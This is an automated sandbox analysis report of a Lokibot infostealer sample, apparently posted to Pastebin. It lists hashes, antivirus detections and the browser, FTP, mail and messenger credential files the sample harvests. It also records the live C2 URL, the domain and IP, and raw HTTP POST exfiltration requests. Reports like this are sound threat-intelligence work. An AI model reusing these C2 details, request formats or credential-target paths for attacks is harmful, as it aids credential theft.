Advertisement
paladin316

Loki_750533f9df37101a46af04831eba538a_exe_2019-08-13_17_30.txt

Aug 13th, 2019
2,150
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.21 KB | None | 0 0
  1.  
  2. * MalFamily: "Lokibot"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Loki_750533f9df37101a46af04831eba538a.exe"
  7. * File Size: 948736
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "25865fb21ae74d3d16822cb520655f55344a2400527944f64059bc79b7d8ad93"
  10. * MD5: "750533f9df37101a46af04831eba538a"
  11. * SHA1: "71c9df9caa8873f28ab4ccafeec5f3e030d9625d"
  12. * SHA512: "bf71bd41ac13cd49004da79f2df38aa095e2a8d72b55227b06e156f2c3f1a7389f7862a130d65e2223231b4eeb0186e583f1369ff98bf382f847168512d6cb06"
  13. * CRC32: "BB1E99EF"
  14. * SSDEEP: "24576:Mtb20pkaCqT5TBWgNQ7atqEuAuRrG86A:1Vg5tQ7atqEy5"
  15.  
  16. * Process Execution:
  17. "Loki_750533f9df37101a46af04831eba538a.exe",
  18. "svchost.exe",
  19. "services.exe"
  20.  
  21.  
  22. * Executed Commands:
  23. "C:\\Windows\\system32\\lsass.exe"
  24.  
  25.  
  26. * Signatures Detected:
  27.  
  28. "Description": "Creates RWX memory",
  29. "Details":
  30.  
  31.  
  32. "Description": "A process attempted to delay the analysis task.",
  33. "Details":
  34.  
  35. "Process": "svchost.exe tried to sleep 1440 seconds, actually delayed analysis time by 0 seconds"
  36.  
  37.  
  38.  
  39.  
  40. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  41. "Details":
  42.  
  43. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  44.  
  45.  
  46. "http_version_old": "HTTP traffic uses version 1.0"
  47.  
  48.  
  49. "suspicious_request": "http://grainertypople.sytes.net/DHBFMM/Panel/five/fre.php"
  50.  
  51.  
  52.  
  53.  
  54. "Description": "Performs some HTTP requests",
  55. "Details":
  56.  
  57. "url": "http://grainertypople.sytes.net/DHBFMM/Panel/five/fre.php"
  58.  
  59.  
  60.  
  61.  
  62. "Description": "Executed a process and injected code into it, probably while unpacking",
  63. "Details":
  64.  
  65. "Injection": "Loki_750533f9df37101a46af04831eba538a.exe(2040) -> svchost.exe(1640)"
  66.  
  67.  
  68.  
  69.  
  70. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  71. "Details":
  72.  
  73. "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 16363591 times"
  74.  
  75.  
  76.  
  77.  
  78. "Description": "Steals private information from local Internet browsers",
  79. "Details":
  80.  
  81. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  82.  
  83.  
  84.  
  85.  
  86. "Description": "Creates a hidden or system file",
  87. "Details":
  88.  
  89. "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
  90.  
  91.  
  92. "file": "C:\\Users\\user\\AppData\\Roaming\\474604"
  93.  
  94.  
  95.  
  96.  
  97. "Description": "File has been identified by 25 Antiviruses on VirusTotal as malicious",
  98. "Details":
  99.  
  100. "MicroWorld-eScan": "AIT:Trojan.Nymeria.265"
  101.  
  102.  
  103. "CAT-QuickHeal": "TrojanPWS.AutoIT.Dclog.S"
  104.  
  105.  
  106. "McAfee": "AUTOIT/Injector.p"
  107.  
  108.  
  109. "Cybereason": "malicious.9df371"
  110.  
  111.  
  112. "Arcabit": "AIT:Trojan.Nymeria.265"
  113.  
  114.  
  115. "APEX": "Malicious"
  116.  
  117.  
  118. "Kaspersky": "Packed.Win32.Krap.im"
  119.  
  120.  
  121. "BitDefender": "AIT:Trojan.Nymeria.265"
  122.  
  123.  
  124. "Ad-Aware": "AIT:Trojan.Nymeria.265"
  125.  
  126.  
  127. "Emsisoft": "AIT:Trojan.Nymeria.265 (B)"
  128.  
  129.  
  130. "Invincea": "heuristic"
  131.  
  132.  
  133. "McAfee-GW-Edition": "BehavesLike.Win32.Dropper.dh"
  134.  
  135.  
  136. "Trapmine": "malicious.moderate.ml.score"
  137.  
  138.  
  139. "FireEye": "Generic.mg.750533f9df37101a"
  140.  
  141.  
  142. "Avira": "HEUR/AGEN.1000260"
  143.  
  144.  
  145. "Microsoft": "PWS:Win32/Fareit.BD!bit"
  146.  
  147.  
  148. "Endgame": "malicious (high confidence)"
  149.  
  150.  
  151. "ZoneAlarm": "Packed.Win32.Krap.im"
  152.  
  153.  
  154. "AhnLab-V3": "Packed/Win32.RL_Krap.R264305"
  155.  
  156.  
  157. "ALYac": "AIT:Trojan.Nymeria.265"
  158.  
  159.  
  160. "MAX": "malware (ai score=88)"
  161.  
  162.  
  163. "ESET-NOD32": "a variant of Win32/Injector.DMUI"
  164.  
  165.  
  166. "MaxSecure": "Trojan.Malware.300983.susgen"
  167.  
  168.  
  169. "GData": "AIT:Trojan.Nymeria.265 (2x)"
  170.  
  171.  
  172. "CrowdStrike": "win/malicious_confidence_100% (W)"
  173.  
  174.  
  175.  
  176.  
  177. "Description": "Harvests credentials from local FTP client softwares",
  178. "Details":
  179.  
  180. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
  181.  
  182.  
  183. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  184.  
  185.  
  186. "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db"
  187.  
  188.  
  189. "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml"
  190.  
  191.  
  192. "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
  193.  
  194.  
  195. "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat"
  196.  
  197.  
  198. "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
  199.  
  200.  
  201. "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
  202.  
  203.  
  204. "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
  205.  
  206.  
  207. "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
  208.  
  209.  
  210.  
  211.  
  212. "Description": "Harvests information related to installed instant messenger clients",
  213. "Details":
  214.  
  215. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  216.  
  217.  
  218.  
  219.  
  220. "Description": "Harvests information related to installed mail clients",
  221. "Details":
  222.  
  223. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
  224.  
  225.  
  226. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email"
  227.  
  228.  
  229. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
  230.  
  231.  
  232. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
  233.  
  234.  
  235. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email"
  236.  
  237.  
  238. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email"
  239.  
  240.  
  241. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  242.  
  243.  
  244. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  245.  
  246.  
  247. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  248.  
  249.  
  250. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email"
  251.  
  252.  
  253. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email"
  254.  
  255.  
  256. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
  257.  
  258.  
  259. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
  260.  
  261.  
  262. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
  263.  
  264.  
  265. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email"
  266.  
  267.  
  268. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
  269.  
  270.  
  271. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email"
  272.  
  273.  
  274. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email"
  275.  
  276.  
  277. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email"
  278.  
  279.  
  280. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email"
  281.  
  282.  
  283. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  284.  
  285.  
  286. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
  287.  
  288.  
  289. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
  290.  
  291.  
  292. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
  293.  
  294.  
  295. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email"
  296.  
  297.  
  298. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
  299.  
  300.  
  301. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
  302.  
  303.  
  304. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email"
  305.  
  306.  
  307. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email"
  308.  
  309.  
  310. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  311.  
  312.  
  313. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
  314.  
  315.  
  316. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
  317.  
  318.  
  319. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
  320.  
  321.  
  322. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
  323.  
  324.  
  325. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email"
  326.  
  327.  
  328.  
  329.  
  330. "Description": "Collects information to fingerprint the system",
  331. "Details":
  332.  
  333.  
  334. "Description": "Created network traffic indicative of malicious activity",
  335. "Details":
  336.  
  337. "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
  338.  
  339.  
  340. "signature": "ET TROJAN LokiBot Fake 404 Response"
  341.  
  342.  
  343. "signature": "ET TROJAN LokiBot Checkin"
  344.  
  345.  
  346. "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
  347.  
  348.  
  349. "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
  350.  
  351.  
  352. "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
  353.  
  354.  
  355. "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
  356.  
  357.  
  358.  
  359.  
  360.  
  361. * Started Service:
  362. "VaultSvc"
  363.  
  364.  
  365. * Mutexes:
  366. "6EFA73A4746045B65DEE781E"
  367.  
  368.  
  369. * Modified Files:
  370. "C:\\Users\\user\\AppData\\Local\\Temp\\aut1937.tmp",
  371. "C:\\Users\\user\\AppData\\Local\\Temp\\1.resource",
  372. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
  373. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
  374.  
  375.  
  376. * Deleted Files:
  377. "C:\\Users\\user\\AppData\\Local\\Temp\\aut1937.tmp",
  378. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
  379. "C:\\Windows\\SysWOW64\\svchost.exe"
  380.  
  381.  
  382. * Modified Registry Keys:
  383.  
  384. * Deleted Registry Keys:
  385.  
  386. * DNS Communications:
  387.  
  388. "type": "A",
  389. "request": "grainertypople.sytes.net",
  390. "answers":
  391.  
  392. "data": "154.120.72.182",
  393. "type": "A"
  394.  
  395.  
  396.  
  397.  
  398.  
  399. * Domains:
  400.  
  401. "ip": "154.120.72.182",
  402. "domain": "grainertypople.sytes.net"
  403.  
  404.  
  405.  
  406. * Network Communication - ICMP:
  407.  
  408. * Network Communication - HTTP:
  409.  
  410. "count": 2,
  411. "body": "",
  412. "uri": "http://grainertypople.sytes.net/DHBFMM/Panel/five/fre.php",
  413. "user-agent": "Mozilla/4.08 (Charon; Inferno)",
  414. "method": "POST",
  415. "host": "grainertypople.sytes.net",
  416. "version": "1.0",
  417. "path": "/DHBFMM/Panel/five/fre.php",
  418. "data": "POST /DHBFMM/Panel/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: grainertypople.sytes.net\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 794AB976\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
  419. "port": 80
  420.  
  421.  
  422. "count": 24,
  423. "body": "",
  424. "uri": "http://grainertypople.sytes.net/DHBFMM/Panel/five/fre.php",
  425. "user-agent": "Mozilla/4.08 (Charon; Inferno)",
  426. "method": "POST",
  427. "host": "grainertypople.sytes.net",
  428. "version": "1.0",
  429. "path": "/DHBFMM/Panel/five/fre.php",
  430. "data": "POST /DHBFMM/Panel/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: grainertypople.sytes.net\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 794AB976\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
  431. "port": 80
  432.  
  433.  
  434. "count": 1,
  435. "body": "\\x12\\x00(\\x00\\x00\\x00\\x07\\x00\\x00\\x00ckav.ru\\x01\\x00\\x06\\x00\\x00\\x00s\\x00b\\x00u\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x80\\x07\\x00\\x00\\xc2\\x03\\x00\\x00\\x01\\x00\\x01\\x00\\x01\\x00\\x06\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x01\\x000\\x00\\x00\\x006\\x00E\\x00F\\x00A\\x007\\x003\\x00A\\x004\\x007\\x004\\x006\\x000\\x004\\x005\\x00B\\x006\\x005\\x00D\\x00E\\x00E\\x007\\x008\\x001\\x00E\\x00",
  436. "uri": "http://grainertypople.sytes.net/DHBFMM/Panel/five/fre.php",
  437. "user-agent": "Mozilla/4.08 (Charon; Inferno)",
  438. "method": "POST",
  439. "host": "grainertypople.sytes.net",
  440. "version": "1.0",
  441. "path": "/DHBFMM/Panel/five/fre.php",
  442. "data": "POST /DHBFMM/Panel/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: grainertypople.sytes.net\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 794AB976\r\nContent-Length: 149\r\nConnection: close\r\n\r\n\\x12\\x00(\\x00\\x00\\x00\\x07\\x00\\x00\\x00ckav.ru\\x01\\x00\\x06\\x00\\x00\\x00s\\x00b\\x00u\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x80\\x07\\x00\\x00\\xc2\\x03\\x00\\x00\\x01\\x00\\x01\\x00\\x01\\x00\\x06\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x01\\x000\\x00\\x00\\x006\\x00E\\x00F\\x00A\\x007\\x003\\x00A\\x004\\x007\\x004\\x006\\x000\\x004\\x005\\x00B\\x006\\x005\\x00D\\x00E\\x00E\\x007\\x008\\x001\\x00E\\x00",
  443. "port": 80
  444.  
  445.  
  446.  
  447. * Network Communication - SMTP:
  448.  
  449. * Network Communication - Hosts:
  450.  
  451. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement